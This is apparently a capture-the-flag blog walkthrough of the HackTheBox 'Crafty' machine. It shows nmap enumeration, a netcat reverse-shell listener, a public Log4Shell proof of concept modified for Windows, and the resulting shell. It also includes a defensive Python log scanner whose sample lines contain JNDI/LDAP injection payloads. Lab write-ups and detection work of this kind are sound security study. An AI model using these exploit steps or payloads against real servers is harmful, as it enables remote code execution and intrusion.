Exploit Minecraft Server | HackTheBox Crafty Walkthrough

Motasem Hamdan
Jun 19, 2024

In this post, we covered the solution to the HackTheBox Crafty machine, where we showcased exploiting a Minecraft server vulnerable to the Log4j vulnerability using a Log4Shell payload.

Information Gathering and Enumeration

We start with an Nmap scan, as shown below:

nmap -p- --min-rate 10000 10.10.11.249
Starting Nmap 7.80 ( https://nmap.org ) at 2024-06-10 15:30 EDT
Nmap scan report for 10.10.11.249
Host is up (0.11s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE
80/tcp open http
25565/tcp open minecraft
Nmap done: 1 IP address (1 host up) scanned in 13.58 seconds
nmap -p 80,25565 -sCV 10.10.11.249
Starting Nmap 7.80 ( https://nmap.org ) at 2024-06-10 15:30 EDT
Nmap scan report for 10.10.11.249
Host is up (0.11s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Did not follow redirect to http://crafty.htb
25565/tcp open minecraft Minecraft 1.16.5 (Protocol: 127, Message: Crafty Server, Users: 0/100)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.95 seconds

Minecraft Server Exploitation

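Based on the nmap scan results, the Minecraft server is running on port 25565, which means we can connect to it using nc. The two bytes sent below are a legacy server list ping, which makes the server reply with its status.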

echo -ne "\xfe\x01" | nc crafty.htb 25565

One of the most dangerous flaws found to date is Log4Shell, a flaw in the popular Java logging package Log4j that allows remote code execution. One popular service that was susceptible to Log4Shell was Minecraft.

The effects of Log4Shell on Minecraft are discussed here. In particular, for versions 1.12–1.16.5 the startup command line needs to be changed in order to patch it, or the server needs to be upgraded to 1.17.
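
From the server operator's side, the same issue can be hunted for in the server log. The following is an added example, not part of the original post or of any tool it uses: it flags chat lines carrying a JNDI lookup, including ones where part of the prefix is hidden inside a nested lookup, and ties each hit to the player's login address. The log line shapes, player names and addresses are constructed assumptions, and it assumes the raw chat text reaches the log.

```python
import re

# Innermost ${...} expression (no nested braces inside it).
INNER = re.compile(r"\$\{([^${}]*)\}")
# Vanilla server log line shapes (assumed from a stock 1.16.5 server).
LOGIN = re.compile(r"\]: (\w+)\[/([\d.]+):\d+\] logged in")
CHAT = re.compile(r"\]: <(\w+)> ")

def _resolve(m):
    # Collapse lookups that only yield literal text; leave everything else.
    body = m.group(1)
    prefix, _, rest = body.partition(":")
    if prefix.lower() in ("lower", "upper"):
        return rest                      # ${lower:X} -> X
    if prefix.lower() != "jndi" and ":-" in body:
        return body.split(":-", 1)[1]    # ${name:-default} -> default
    return m.group(0)

def normalize(text, max_passes=10):
    """Resolve nested lookups from the inside out until nothing changes."""
    for _ in range(max_passes):
        new = INNER.sub(_resolve, text)
        if new == text:
            break
        text = new
    return text

def scan(lines):
    """Return (line_no, player, source_ip) for each line with a JNDI lookup."""
    ip_of, hits = {}, []
    for no, line in enumerate(lines, 1):
        login = LOGIN.search(line)
        if login:
            ip_of[login.group(1)] = login.group(2)
        if "${jndi:" in normalize(line).lower():
            chat = CHAT.search(line)
            player = chat.group(1) if chat else None
            hits.append((no, player, ip_of.get(player)))
    return hits

# Constructed sample log; names and addresses are placeholders.
SAMPLE = [
    "[15:31:02] [Server thread/INFO]: <alice> hello",
    "[15:31:40] [Server thread/INFO]: mallory[/192.0.2.10:49682] logged in with entity id 42 at (0.5, 64.0, 0.5)",
    "[15:31:44] [Server thread/INFO]: <mallory> ${jndi:ldap://192.0.2.10:1389/a}",
    "[15:32:10] [Server thread/INFO]: <mallory> ${${lower:j}ndi:ldap://192.0.2.10:1389/a}",
]
if __name__ == "__main__":
    print(scan(SAMPLE))
```

A plain substring search for the lookup prefix would miss the last sample line; normalizing first catches it.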

Start by downloading the Minecraft console client from here, because you will need it to interact with the server and send the Log4j payload.

As shown below, we connect to the server using kali as the username and supply a blank password along with the IP address of the Crafty machine.

./MinecraftClient-20240415-263-linux-x64 kali
Minecraft Console Client v1.20.4 - for MC 1.4.6 to 1.20.4 - Github.com/MCCTeam
GitHub build 263, built on 2024-04-15 from commit 403284c
Password(invisible):
You chose to run in offline mode.
Server IP :
Resolving crafty.htb...
Retrieving Server Info...
Server version : 1.16.5 (protocol v754)
[MCC] Version is supported.
Logging in...
[MCC] Server is in offline mode.
[MCC] Server was successfully joined.
Type '/quit' to leave the server.
>

The next step is to fire up a listener on your attacking machine:

nc -lnvp 445
Listening on 0.0.0.0 445
Connection received on 10.10.11.249 49682

Next, download the POC and install the requirements.

attacker@attacker$ git clone https://github.com/kozmer/log4j-shell-poc.git
attacker@attacker$ cd log4j-shell-poc/
attacker@attacker$ pip install -r requirements.txt

Before we start the exploit, we must first download the relevant Java binary from here, place it in the same directory as the POC exploit, and rename it to jdk1.8.0_20.

Next, open the exploit POC Python file, locate the line that says String cmd="/bin/sh";, and change it to String cmd="cmd.exe"; because the target OS here is Windows and /bin/sh won’t work on Windows.

And lastly, run the exploit:

python poc.py --userip 10.10.14.6 --webport 8000 --lport 445

Now jump back to the Minecraft console client and send the payload given by the POC.

This will return a shell to the listener you started earlier.

c:\Users\svc_minecraft\Desktop> powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Users\svc_minecraft\Desktop>

Full writeup can be found here

Motasem Hamdan is a cybersecurity consultant and content creator. He is also a marketing expert and growth hacker. https://www.youtube.com/@MotasemHamdan